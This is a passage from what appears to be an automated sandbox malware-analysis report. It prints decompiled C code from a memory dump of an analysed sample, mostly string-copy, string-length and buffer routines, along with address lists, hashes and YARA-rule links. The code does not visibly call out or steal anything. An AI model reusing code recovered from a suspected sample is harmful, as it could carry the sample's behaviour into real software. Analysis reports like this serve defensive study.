											_v64 = _t148;
											_t152 = _v48;
											while(1) {
												_t135 = _t135 + 1;
												_t105 =  *((char*)(_t152 + _t135 * 2 - 1));
												 *((char*)(_t86 + _t135 * 2 - 1)) = _t105;
												if(_t105 == 0) {
													break;
												}
												_t106 =  *((char*)(_t152 + _t135 * 2));
												 *((char*)(_t86 + _t135 * 2)) = _t106;
												if(_t106 != 0) {
													continue;
												}
												break;
											}
											_t104 = _v56;
											_t148 = _v64;
											_t150 =  *_t157;
											goto L41;
										}
									}
									_t86 =  *_t150;
									goto L44;
								}
								_t89 = _t125 & 0x0000000f;
								if(_t89 == 0) {
									L23:
									asm("pxor xmm1, xmm1");
									_v36 = _t98;
									_t112 =  ~( ~_t89 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+eax]");
										asm("pcmpeqb xmm0, xmm1");
										asm("pmovmskb ebx, xmm0");
										if(_t98 != 0) {
											break;
										}
										_t89 = _t89 + 0x10;
										if(_t89 < _t112) {
											continue;
										}
										_t98 = _v36;
										if(_t112 >= 0x7fffffff) {
											L29:
											_t104 = 0x7fffffff;
											goto L30;
										}
										while( *((char*)(_t112 + _t125)) != 0) {
											_t112 = _t112 + 1;
											if(_t112 < 0x7fffffff) {
												continue;
											}
											goto L29;
										}
										L50:
										if(_t104 == 0xfffffffe) {
											 *_t125 = 0;
										}
										goto L30;
									}
									_t113 = _t98;
									asm("bsf ecx, ecx");
									_t98 = _v36;
									_t104 = _t113 + _t89;
									goto L50;
								}
								_t104 = 0;
								_t89 =  ~_t89 + 0x10;
								while( *((char*)(_t104 + _t125)) != 0) {
									_t104 = _t104 + 1;
									if(_t104 < _t89) {
										continue;
									}
									goto L23;
								}
								goto L50;
							}
							L48:
						} while (_t148 < _v28);
						goto L49;
					}
					_t138 =  *_t100;
					 *_t74 = _t138;
					if(_t138 == 0) {
						goto L9;
					}
					_v28 = _t146;
					 *_t157 = _t150;
					_t153 = 0;
					while(1) {
						_t153 = _t153 + 1;
						_t140 =  *((char*)(_t100 + _t153 * 2 - 1));
						 *((char*)(_t74 + _t153 * 2 - 1)) = _t140;
						if(_t140 == 0) {
							break;
						}
						_t141 =  *((char*)(_t100 + _t153 * 2));
						 *((char*)(_t74 + _t153 * 2)) = _t141;
						if(_t141 != 0) {
							continue;
						}
						break;
					}
					_t146 = _v28;
					_t150 =  *_t157;
					goto L9;
				}
			}

0x003c5cb9
0x003c5cbc
0x003c5cbe
0x003c5cc1
0x003c5cc6
0x003c5cda
0x003c5cda
0x003c5cdc
0x003c5ce0
0x003c5ce2
0x003c5ce5
0x003c5cea
0x003c5ced
0x003c5cf1
0x003c5d40
0x00000000
0x003c5cf3
0x003c5cf5
0x003c5d2b
0x003c5d2b
0x003c5d2d
0x003c5d2e
0x003c5d32
0x003c5d37
0x003c5d3b
0x003c5d43
0x003c5d43
0x003c5d45
0x003c5d4e
0x003c5f37
0x003c5f42
0x003c5f42
0x003c5d63
0x003c5d67
0x003c5d6b
0x003c5d6f
0x003c5d73
0x003c5d77
0x003c5d79
0x003c5d85
0x003c5d88
0x003c5d8e
0x003c5d97
0x003c5d9d
0x003c5f1a
0x003c5f20
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c5dae
0x003c5dae
0x003c5db0
0x003c5f17
0x003c5f17
0x00000000
0x003c5f17
0x003c5db6
0x003c5dba
0x003c5f63
0x003c5e37
0x003c5e3c
0x003c5e42
0x003c5e48
0x003c5e5b
0x003c5e5e
0x003c5e62
0x003c5e68
0x003c5e70
0x003c5e70
0x003c5e7d
0x003c5e80
0x003c5e84
0x003c5e85
0x003c5e89
0x003c5e8e
0x003c5e92
0x003c5e95
0x003c5e97
0x003c5e9d
0x003c5f01
0x00000000
0x003c5e9f
0x003c5ea1
0x003c5ee1
0x003c5ee1
0x003c5ee3
0x003c5ee7
0x003c5eeb
0x003c5eef
0x003c5ef4
0x003c5ef8
0x003c5efc
0x003c5f04
0x003c5f08
0x003c5f0b
0x003c5f0d
0x003c5f0d
0x003c5f12
0x00000000
0x003c5f12
0x003c5ea3
0x003c5ea6
0x003c5eaa
0x00000000
0x00000000
0x003c5eac
0x003c5eaf
0x003c5eb1
0x003c5eb5
0x003c5eb9
0x003c5ebd
0x003c5ebd
0x003c5ebe
0x003c5ec3
0x003c5ec9
0x00000000
0x00000000
0x003c5ecb
0x003c5ecf
0x003c5ed4
0x00000000
0x00000000
0x00000000
0x003c5ed4
0x003c5ed6
0x003c5eda
0x003c5ede
0x00000000
0x003c5ede
0x003c5e9d
0x003c5e4a
0x00000000
0x003c5e4a
0x003c5dc2
0x003c5dc5
0x003c5ddd
0x003c5de1
0x003c5ded
0x003c5df1
0x003c5df7
0x003c5df7
0x003c5dfc
0x003c5e00
0x003c5e06
0x00000000
0x00000000
0x003c5e0c
0x003c5e11
0x00000000
0x00000000
0x003c5e13
0x003c5e1d
0x003c5e32
0x003c5e32
0x00000000
0x003c5e32
0x003c5e1f
0x003c5e29
0x003c5e30
0x00000000
0x00000000
0x00000000
0x003c5e30
0x003c5f45
0x003c5f48
0x003c5f4e
0x003c5f4e
0x00000000
0x003c5f48
0x003c5f56
0x003c5f58
0x003c5f5b
0x003c5f5f
0x00000000
0x003c5f5f
0x003c5dc9
0x003c5dcb
0x003c5dce
0x003c5dd8
0x003c5ddb
0x00000000
0x00000000
0x00000000
0x003c5ddb
0x00000000
0x003c5dce
0x003c5f2d
0x003c5f2d
0x00000000
0x003c5d79
0x003c5cf7
0x003c5cfa
0x003c5cfe
0x00000000
0x00000000
0x003c5d02
0x003c5d06
0x003c5d09
0x003c5d0b
0x003c5d0b
0x003c5d0c
0x003c5d11
0x003c5d17
0x00000000
0x00000000
0x003c5d19
0x003c5d1d
0x003c5d22
0x00000000
0x00000000
0x00000000
0x003c5d22
0x003c5d24
0x003c5d28
0x00000000
0x003c5d28

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction ID: 2c78b0cf1703ba5173bdd4a84869a62ea558fd6e49df68e438e73854b6546175
Opcode Fuzzy Hash: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction Fuzzy Hash: 8F81F671608B428BD71ACF28C480B2AB7D2BFD5314F19866DE4D6CB351DB75AD81C782

Uniqueness

Uniqueness Score: -1.00%

Function 003B98DA, Relevance: .2, Instructions: 220
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E003B98DA(void* __eax, void* __esi) {
				signed int _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int* _t57;
				void* _t61;
				signed short** _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed short* _t70;
				signed short* _t71;
				signed int _t73;
				unsigned int _t78;
				signed int _t79;
				signed short* _t81;
				signed short* _t82;
				signed short* _t83;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				void* _t98;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				void* _t108;
				signed short* _t110;
				signed int _t116;
				void* _t118;
				void* _t120;
				void* _t121;

				_t108 = __esi;
				_t121 = _t120 + 0x10;
				if(__eax > 0) {
					_t65 =  *(_t121 + 8);
					if(_t106 == 0) {
						L40:
						_t70 =  *_t65;
						if(_t70 != 0) {
							 *_t70 = 0;
						}
						if(_t65[1] < 0x40) {
							_push(0x80);
							_t110 = E003B1030();
							_t121 = _t121 + 4;
							_t71 =  *_t65;
							if(_t71 == 0) {
								 *_t110 = 0;
							} else {
								if(_t110 != 0) {
									_t87 =  *_t71 & 0x0000ffff;
									 *_t110 = _t87;
									if(_t87 != 0) {
										_t88 = 0;
										while(1) {
											_t88 = _t88 + 1;
											_t52 =  *(_t71 + _t88 * 4 - 2) & 0x0000ffff;
											 *(_t110 + _t88 * 4 - 2) = _t52;
											if(_t52 == 0) {
												goto L49;
											}
											_t53 =  *(_t71 + _t88 * 4) & 0x0000ffff;
											 *(_t110 + _t88 * 4) = _t53;
											if(_t53 != 0) {
												continue;
											}
											goto L49;
										}
									}
								}
								L49:
								_push(2);
								_push(_t71);
								E003B10B0();
								_t121 = _t121 + 8;
							}
							 *_t65 = _t110;
							_t65[1] = 0x40;
						}
					} else {
						_t90 =  *_t106 & 0x0000ffff;
						if(_t90 == 0) {
							goto L40;
						} else {
							_t73 = _t106 & 0x0000000f;
							if(_t73 == 0) {
								L11:
								asm("pxor xmm0, xmm0");
								_t116 =  ~( ~_t73 + 0x00000007 & 0x00000007) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [edi+ecx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb edx, xmm1");
									if(_t90 != 0) {
										break;
									}
									_t73 = _t73 + 8;
									if(_t73 < _t116) {
										continue;
									} else {
										if(_t116 >= 0x7fffffff) {
											goto L17;
										} else {
											goto L15;
										}
									}
									goto L18;
								}
								asm("bsf esi, edx");
								_t116 = (_t116 >> 1) + _t73;
								goto L53;
							} else {
								_t116 = 0;
								if((_t73 & 0x00000001) != 0) {
									L15:
									while(( *(_t106 + _t116 * 2) & 0x0000ffff) != 0) {
										_t116 = _t116 + 1;
										if(_t116 < 0x7fffffff) {
											continue;
										} else {
											L17:
											_t116 = 0x7fffffff;
										}
										goto L18;
									}
									goto L53;
								} else {
									_t73 =  ~_t73 + 0x10 >> 1;
									while(1) {
										_t90 =  *(_t106 + _t116 * 2) & 0x0000ffff;
										if(_t90 == 0) {
											break;
										}
										_t116 = _t116 + 1;
										if(_t116 < _t73) {
											continue;
										} else {
											goto L11;
										}
										goto L18;
									}
									L53:
									if(_t116 == 0xffffffff) {
										_t83 =  *_t65;
										if(_t83 != 0) {
											 *_t83 = 0;
										}
									}
								}
							}
							L18:
							_t55 =  <=  ? 0x40 : _t116 + 1;
							if(_t55 > _t65[1]) {
								_t78 = (_t55 >> 5 >> 0x1a) + _t55 >> 6;
								_t56 = _t55 & 0x8000003f;
								if(_t56 < 0) {
									_t56 = (_t56 - 0x00000001 | 0xffffffc0) + 1;
								}
								_t79 = _t78 + (0 | _t56 > 0x00000000);
								 *(_t121 + 4) = _t79 << 6;
								_push(_t79 << 7);
								_t57 = E003B1030();
								_t121 = _t121 + 4;
								_t81 =  *_t65;
								if(_t81 == 0) {
									 *_t57 = 0;
								} else {
									if(_t57 != 0) {
										_t100 =  *_t81 & 0x0000ffff;
										 *_t57 = _t100;
										if(_t100 != 0) {
											 *(_t121 + 8) = _t65;
											_t101 = 0;
											while(1) {
												_t101 = _t101 + 1;
												_t68 =  *(_t81 + _t101 * 4 - 2) & 0x0000ffff;
												 *(_t57 + _t101 * 4 - 2) = _t68;
												if(_t68 == 0) {
													break;
												}
												_t69 =  *(_t81 + _t101 * 4) & 0x0000ffff;
												_t57[_t101] = _t69;
												if(_t69 != 0) {
													continue;
												}
												break;
											}
											_t65 =  *(_t121 + 8);
										}
									}
									_push(2);
									_push(_t81);
									 *(_t121 + 8) = _t57;
									E003B10B0();
									_t57 =  *(_t121 + 8);
									_t121 = _t121 + 8;
								}
								_t65[1] =  *(_t121 + 4);
								 *_t65 = _t57;
							} else {
								_t57 =  *_t65;
							}
							_t82 = _t106;
							if(_t57 != 0 && _t106 != 0) {
								 *(_t121 + 8) = _t65;
								_t98 = 0;
								while(1) {
									_t67 =  *_t82 & 0x0000ffff;
									_t98 = _t98 + 1;
									 *_t57 = _t67;
									if(_t116 != 0 && _t98 == _t116) {
										break;
									}
									if(_t67 == 0) {
										_t65 =  *(_t121 + 8);
									} else {
										_t57 =  &(_t57[0]);
										_t82 =  &(_t82[1]);
										continue;
									}
									goto L52;
								}
								_t65 =  *(_t121 + 8);
								_t57[0] = 0;
							}
						}
					}
					L52:
					_push(2);
					_push(_t106);
					E003B10B0();
					return _t65;
				} else {
					do {
						_push(2);
						_push(_t106);
						E003B10B0();
						_t108 = _t108 + _t108;
						_push(_t108 + _t108);
						_t106 = E003B1030();
						_t121 = _t121 + 0xc;
						_t61 = E003B15C0(0x588ab3ea, 0x5790ac4);
					} while (_t61 == 0);
					_push(_t118 + 0x10);
					_push(_t108);
					_push(_t106);
					asm("int3");
					return _t61;
				}
			}

0x003b98da
0x003b98da
0x003b98df
0x003b98fb
0x003b9901
0x003b9a78
0x003b9a78
0x003b9a7c
0x003b9a80
0x003b9a80
0x003b9a87
0x003b9a89
0x003b9a93
0x003b9a95
0x003b9a98
0x003b9a9c
0x003b9ad8
0x003b9a9e
0x003b9aa0
0x003b9aa2
0x003b9aa5
0x003b9aaa
0x003b9aac
0x003b9aae
0x003b9aae
0x003b9aaf
0x003b9ab4
0x003b9abb
0x00000000
0x00000000
0x003b9abd
0x003b9ac1
0x003b9ac7
0x00000000
0x00000000
0x00000000
0x003b9ac7
0x003b9aae
0x003b9aaa
0x003b9ac9
0x003b9ac9
0x003b9acb
0x003b9acc
0x003b9ad1
0x003b9ad1
0x003b9adb
0x003b9add
0x003b9add
0x003b9907
0x003b9907
0x003b990c
0x00000000
0x003b9912
0x003b9914
0x003b9917
0x003b9938
0x003b993c
0x003b9948
0x003b994e
0x003b994e
0x003b9953
0x003b9957
0x003b995d
0x00000000
0x00000000
0x003b9963
0x003b9968
0x00000000
0x003b996a
0x003b9970
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9970
0x00000000
0x003b9968
0x003b9b27
0x003b9b2c
0x00000000
0x003b9919
0x003b9919
0x003b991e
0x00000000
0x003b9972
0x003b997e
0x003b9985
0x00000000
0x003b9987
0x003b9987
0x003b9987
0x003b9987
0x00000000
0x003b9985
0x00000000
0x003b9920
0x003b9925
0x003b9927
0x003b9927
0x003b992d
0x00000000
0x00000000
0x003b9933
0x003b9936
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9936
0x003b9af8
0x003b9afb
0x003b9b01
0x003b9b05
0x003b9b0d
0x003b9b0d
0x003b9b05
0x003b9afb
0x003b991e
0x003b998c
0x003b9997
0x003b999d
0x003b99b0
0x003b99b3
0x003b99b8
0x003b99c0
0x003b99c0
0x003b99c8
0x003b99d2
0x003b99d6
0x003b99d7
0x003b99dc
0x003b99df
0x003b99e3
0x003b9a2f
0x003b99e5
0x003b99e7
0x003b99e9
0x003b99ec
0x003b99f1
0x003b99f3
0x003b99f7
0x003b99f9
0x003b99f9
0x003b99fa
0x003b99ff
0x003b9a06
0x00000000
0x00000000
0x003b9a08
0x003b9a0c
0x003b9a12
0x00000000
0x00000000
0x00000000
0x003b9a12
0x003b9a14
0x003b9a14
0x003b99f1
0x003b9a18
0x003b9a1a
0x003b9a1b
0x003b9a1f
0x003b9a24
0x003b9a28
0x003b9a28
0x003b9a36
0x003b9a39
0x003b999f
0x003b999f
0x003b999f
0x003b9a3b
0x003b9a3f
0x003b9a4d
0x003b9a51
0x003b9a5b
0x003b9a5b
0x003b9a5e
0x003b9a5f
0x003b9a64
0x00000000
0x00000000
0x003b9a70
0x003b9b21
0x003b9a76
0x003b9a55
0x003b9a58
0x00000000
0x003b9a58
0x00000000
0x003b9a70
0x003b9b17
0x003b9b1b
0x003b9b1b
0x003b9a3f
0x003b990c
0x003b9ae4
0x003b9ae4
0x003b9ae6
0x003b9ae7
0x003b9af7
0x003b98e1
0x003b98e1
0x003b98e1
0x003b98e3
0x003b98e4
0x003b98e9
0x003b98ee
0x003b98f4
0x003b98f6
0x003b98c8
0x003b98cd
0x003b98d4
0x003b98d6
0x003b98d7
0x003b98d8
0x003b98d9
0x003b98d9

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction ID: b9c3106781ad9e81c91414cee24fd3c6de93f1adb50993f00d58d6c3820a6458
Opcode Fuzzy Hash: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction Fuzzy Hash: 2D614C71A0072186D7268F29C8917B673E6AFC5748B2EC22FDF564BA99FB318C418351

Uniqueness

Uniqueness Score: -1.00%

Function 003BA0D0, Relevance: .2, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003BA0D0(signed int* __ecx, signed short** _a4) {
				signed int _v32;
				signed short* _v36;
				signed short* _t62;
				unsigned int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t74;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed short* _t90;
				signed int _t92;
				signed int _t95;
				signed short* _t99;
				void* _t101;
				signed short** _t106;
				signed int _t107;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				signed int _t117;
				signed int _t118;
				signed int _t123;
				signed int _t124;
				signed int _t130;
				signed int _t132;
				void* _t134;

				_push(_t73);
				_t134 = (_t132 & 0xfffffff0) - 0x14;
				_t106 = _a4;
				_t112 =  *__ecx;
				 *_t106 = 0;
				_t106[1] = 0;
				if(_t112 == 0 || ( *_t112 & 0x0000ffff) == 0) {
					_push(0x80);
					_t62 = E003B1030();
					_t106 = _a4;
					_t134 = _t134 + 4;
					_t90 =  *_t106;
					if(_t90 == 0) {
						 *_t62 = 0;
					} else {
						if(_t62 != 0) {
							_t78 =  *_t90 & 0x0000ffff;
							 *_t62 = _t78;
							if(_t78 != 0) {
								_t79 = 0;
								while(1) {
									_t79 = _t79 + 1;
									_t123 =  *(_t90 + _t79 * 4 - 2) & 0x0000ffff;
									 *(_t62 + _t79 * 4 - 2) = _t123;
									if(_t123 == 0) {
										goto L41;
									}
									_t124 =  *(_t90 + _t79 * 4) & 0x0000ffff;
									 *(_t62 + _t79 * 4) = _t124;
									if(_t124 != 0) {
										continue;
									}
									goto L41;
								}
							}
						}
						L41:
						_push(2);
						_push(_t90);
						_v36 = _t62;
						E003B10B0();
						_t106 = _a4;
						_t62 = _v36;
						_t134 = _t134 + 8;
					}
					_t106[1] = 0x40;
					 *_t106 = _t62;
				} else {
					_t95 = _t112 & 0x0000000f;
					if(_t95 == 0) {
						L7:
						asm("pxor xmm0, xmm0");
						_t130 =  ~( ~_t95 + 0x00000007 & 0x00000007) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [edi+ecx*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb ebx, xmm1");
							if(_t73 != 0) {
								break;
							}
							_t95 = _t95 + 8;
							if(_t95 < _t130) {
								continue;
							} else {
								if(_t130 >= 0x7fffffff) {
									goto L13;
								} else {
									goto L11;
								}
							}
							goto L14;
						}
						asm("bsf esi, ebx");
						_t130 = (_t130 >> 1) + _t95;
					} else {
						_t130 = 0;
						if((_t95 & 0x00000001) != 0) {
							L11:
							while(( *(_t112 + _t130 * 2) & 0x0000ffff) != 0) {
								_t130 = _t130 + 1;
								if(_t130 < 0x7fffffff) {
									continue;
								} else {
									L13:
									_t130 = 0x7fffffff;
								}
								goto L14;
							}
						} else {
							_t95 =  ~_t95 + 0x10 >> 1;
							while(1) {
								_t73 =  *(_t112 + _t130 * 2) & 0x0000ffff;
								if(_t73 == 0) {
									goto L14;
								}
								_t130 = _t130 + 1;
								if(_t130 < _t95) {
									continue;
								} else {
									goto L7;
								}
								goto L14;
							}
						}
					}
					L14:
					_t9 = _t130 + 1; // 0x80000000
					_t81 =  <=  ? 0x40 : _t9;
					if(_t81 > 0) {
						_t69 = (_t81 >> 5 >> 0x1a) + _t81 >> 6;
						_t82 = _t81 & 0x8000003f;
						if(_t82 < 0) {
							_t82 = (_t82 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t70 = _t69 + (0 | _t82 > 0x00000000);
						_push(_t70 << 7);
						_t84 = _t70 << 6;
						_t62 = E003B1030();
						_t106 = _a4;
						_t134 = _t134 + 4;
						_t99 =  *_t106;
						if(_t99 == 0) {
							 *_t62 = 0;
						} else {
							if(_t62 != 0) {
								_t107 =  *_t99 & 0x0000ffff;
								 *_t62 = _t107;
								if(_t107 != 0) {
									_v32 = 0;
									_v36 = _t112;
									_t109 = _v32;
									while(1) {
										_t109 = _t109 + 1;
										_t117 =  *(_t99 + _t109 * 4 - 2) & 0x0000ffff;
										 *(_t62 + _t109 * 4 - 2) = _t117;
										if(_t117 == 0) {
											break;
										}
										_t118 =  *(_t99 + _t109 * 4) & 0x0000ffff;
										 *(_t62 + _t109 * 4) = _t118;
										if(_t118 != 0) {
											continue;
										}
										break;
									}
									_t112 = _v36;
								}
							}
							_push(2);
							_push(_t99);
							_v36 = _t62;
							E003B10B0();
							_t106 = _a4;
							_t62 = _v36;
							_t134 = _t134 + 8;
						}
						_t106[1] = _t84;
						 *_t106 = _t62;
					} else {
						_t62 = 0;
					}
					if(_t62 != 0) {
						_t101 = 0;
						while(1) {
							_t85 =  *_t112 & 0x0000ffff;
							_t101 = _t101 + 1;
							 *_t62 = _t85;
							if(_t130 != 0 && _t101 == _t130) {
								break;
							}
							if(_t85 == 0) {
								_t62 =  *_t106;
							} else {
								_t62 =  &(_t62[1]);
								_t112 = _t112 + 2;
								continue;
							}
							goto L44;
						}
						_t62[1] = 0;
						_t62 =  *_t106;
					}
				}
				L44:
				_t74 =  *_t62 & 0x0000ffff;
				if(_t74 != 0) {
					_t92 = 0;
					while(1) {
						_t92 = _t92 + 1;
						_t47 = _t74 + 0x20; // 0x20
						_t76 =  <=  ? _t47 : _t74;
						_t115 =  *(_t62 + _t92 * 4 - 2) & 0x0000ffff;
						 *((short*)(_t62 + _t92 * 4 - 4)) =  <=  ? _t47 : _t74;
						if(_t115 == 0) {
							goto L48;
						}
						_t74 =  *(_t62 + _t92 * 4) & 0x0000ffff;
						_t116 =  <=  ? _t115 + 0x20 : _t115;
						 *(_t62 + _t92 * 4 - 2) =  <=  ? _t115 + 0x20 : _t115;
						if(_t74 != 0) {
							continue;
						}
						goto L48;
					}
				}
				L48:
				return _t106;
			}

0x003ba0d8
0x003ba0d9
0x003ba0dc
0x003ba0df
0x003ba0e3
0x003ba0e5
0x003ba0ea
0x003ba257
0x003ba25c
0x003ba261
0x003ba264
0x003ba267
0x003ba26b
0x003ba2b2
0x003ba26d
0x003ba26f
0x003ba271
0x003ba274
0x003ba279
0x003ba27b
0x003ba27d
0x003ba27d
0x003ba27e
0x003ba283
0x003ba28a
0x00000000
0x00000000
0x003ba28c
0x003ba290
0x003ba296
0x00000000
0x00000000
0x00000000
0x003ba296
0x003ba27d
0x003ba279
0x003ba298
0x003ba298
0x003ba29a
0x003ba29b
0x003ba29f
0x003ba2a4
0x003ba2a7
0x003ba2ab
0x003ba2ab
0x003ba2b5
0x003ba2bc
0x003ba0fb
0x003ba0fd
0x003ba100
0x003ba11d
0x003ba121
0x003ba12d
0x003ba133
0x003ba133
0x003ba138
0x003ba13c
0x003ba142
0x00000000
0x00000000
0x003ba148
0x003ba14d
0x00000000
0x003ba14f
0x003ba155
0x00000000
0x00000000
0x00000000
0x00000000
0x003ba155
0x00000000
0x003ba14d
0x003ba317
0x003ba31c
0x003ba102
0x003ba102
0x003ba107
0x00000000
0x003ba157
0x003ba15f
0x003ba166
0x00000000
0x003ba168
0x003ba168
0x003ba168
0x003ba168
0x00000000
0x003ba166
0x003ba109
0x003ba10e
0x003ba110
0x003ba110
0x003ba116
0x00000000
0x00000000
0x003ba118
0x003ba11b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003ba11b
0x003ba110
0x003ba107
0x003ba16d
0x003ba172
0x003ba178
0x003ba17d
0x003ba190
0x003ba193
0x003ba199
0x003ba1a1
0x003ba1a1
0x003ba1a9
0x003ba1b0
0x003ba1b1
0x003ba1b4
0x003ba1b9
0x003ba1bc
0x003ba1bf
0x003ba1c3
0x003ba220
0x003ba1c5
0x003ba1c7
0x003ba1c9
0x003ba1cc
0x003ba1d4
0x003ba1d6
0x003ba1de
0x003ba1e1
0x003ba1e5
0x003ba1e5
0x003ba1e6
0x003ba1eb
0x003ba1f2
0x00000000
0x00000000
0x003ba1f4
0x003ba1f8
0x003ba1fe
0x00000000
0x00000000
0x00000000
0x003ba1fe
0x003ba200
0x003ba203
0x003ba1d4
0x003ba206
0x003ba208
0x003ba209
0x003ba20d
0x003ba212
0x003ba215
0x003ba219
0x003ba219
0x003ba223
0x003ba226
0x003ba17f
0x003ba17f
0x003ba17f
0x003ba22a
0x003ba230
0x003ba23a
0x003ba23a
0x003ba23d
0x003ba23e
0x003ba243
0x00000000
0x00000000
0x003ba24f
0x003ba313
0x003ba255
0x003ba234
0x003ba237
0x00000000
0x003ba237
0x00000000
0x003ba24f
0x003ba30b
0x003ba30f
0x003ba30f
0x003ba22a
0x003ba2be
0x003ba2be
0x003ba2c3
0x003ba2c5
0x003ba2c7
0x003ba2c7
0x003ba2ce
0x003ba2d1
0x003ba2d4
0x003ba2d9
0x003ba2e0
0x00000000
0x00000000
0x003ba2eb
0x003ba2ef
0x003ba2f2
0x003ba2f9
0x00000000
0x00000000
0x00000000
0x003ba2f9
0x003ba2c7
0x003ba2fb
0x003ba306

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction ID: 391eba40a336a88ffa3cea27665ff83831d81674c859777494ccd913816e6e2e
Opcode Fuzzy Hash: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction Fuzzy Hash: 0B613772A04F1287C7264F1CC4916ABB3A1BF85758B5A472DDF568FB90EB329C41C392

Uniqueness

Uniqueness Score: -1.00%

Function 003B9E70, Relevance: .2, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003B9E70(signed int* __ecx, signed short** _a4) {
				signed int _v32;
				signed short* _v36;
				signed short* _t62;
				unsigned int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t74;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed short* _t90;
				signed int _t92;
				signed int _t95;
				signed short* _t99;
				void* _t101;
				signed short** _t106;
				signed int _t107;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				signed int _t117;
				signed int _t118;
				signed int _t123;
				signed int _t124;
				signed int _t130;
				signed int _t132;
				void* _t134;

				_push(_t73);
				_t134 = (_t132 & 0xfffffff0) - 0x14;
				_t106 = _a4;
				_t112 =  *__ecx;
				 *_t106 = 0;
				_t106[1] = 0;
				if(_t112 == 0 || ( *_t112 & 0x0000ffff) == 0) {
					_push(0x80);
					_t62 = E003B1030();
					_t106 = _a4;
					_t134 = _t134 + 4;
					_t90 =  *_t106;
					if(_t90 == 0) {
						 *_t62 = 0;
					} else {
						if(_t62 != 0) {
							_t78 =  *_t90 & 0x0000ffff;
							 *_t62 = _t78;
							if(_t78 != 0) {
								_t79 = 0;
								while(1) {
									_t79 = _t79 + 1;
									_t123 =  *(_t90 + _t79 * 4 - 2) & 0x0000ffff;
									 *(_t62 + _t79 * 4 - 2) = _t123;
									if(_t123 == 0) {
										goto L41;
									}
									_t124 =  *(_t90 + _t79 * 4) & 0x0000ffff;
									 *(_t62 + _t79 * 4) = _t124;
									if(_t124 != 0) {
										continue;
									}
									goto L41;
								}
							}
						}
						L41:
						_push(2);
						_push(_t90);
						_v36 = _t62;
						E003B10B0();
						_t106 = _a4;
						_t62 = _v36;
						_t134 = _t134 + 8;
					}
					_t106[1] = 0x40;
					 *_t106 = _t62;
				} else {
					_t95 = _t112 & 0x0000000f;
					if(_t95 == 0) {
						L7:
						asm("pxor xmm0, xmm0");
						_t130 =  ~( ~_t95 + 0x00000007 & 0x00000007) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [edi+ecx*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb ebx, xmm1");
							if(_t73 != 0) {
								break;
							}
							_t95 = _t95 + 8;
							if(_t95 < _t130) {
								continue;
							} else {
								if(_t130 >= 0x7fffffff) {
									goto L13;
								} else {
									goto L11;
								}
							}
							goto L14;
						}
						asm("bsf esi, ebx");
						_t130 = (_t130 >> 1) + _t95;
					} else {
						_t130 = 0;
						if((_t95 & 0x00000001) != 0) {
							L11:
							while(( *(_t112 + _t130 * 2) & 0x0000ffff) != 0) {
								_t130 = _t130 + 1;
								if(_t130 < 0x7fffffff) {
									continue;
								} else {
									L13:
									_t130 = 0x7fffffff;
								}
								goto L14;
							}
						} else {
							_t95 =  ~_t95 + 0x10 >> 1;
							while(1) {
								_t73 =  *(_t112 + _t130 * 2) & 0x0000ffff;
								if(_t73 == 0) {
									goto L14;
								}
								_t130 = _t130 + 1;
								if(_t130 < _t95) {
									continue;
								} else {
									goto L7;
								}
								goto L14;
							}
						}
					}
					L14:
					_t9 = _t130 + 1; // 0x80000000
					_t81 =  <=  ? 0x40 : _t9;
					if(_t81 > 0) {
						_t69 = (_t81 >> 5 >> 0x1a) + _t81 >> 6;
						_t82 = _t81 & 0x8000003f;
						if(_t82 < 0) {
							_t82 = (_t82 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t70 = _t69 + (0 | _t82 > 0x00000000);
						_push(_t70 << 7);
						_t84 = _t70 << 6;
						_t62 = E003B1030();
						_t106 = _a4;
						_t134 = _t134 + 4;
						_t99 =  *_t106;
						if(_t99 == 0) {
							 *_t62 = 0;
						} else {
							if(_t62 != 0) {
								_t107 =  *_t99 & 0x0000ffff;
								 *_t62 = _t107;
								if(_t107 != 0) {
									_v32 = 0;
									_v36 = _t112;
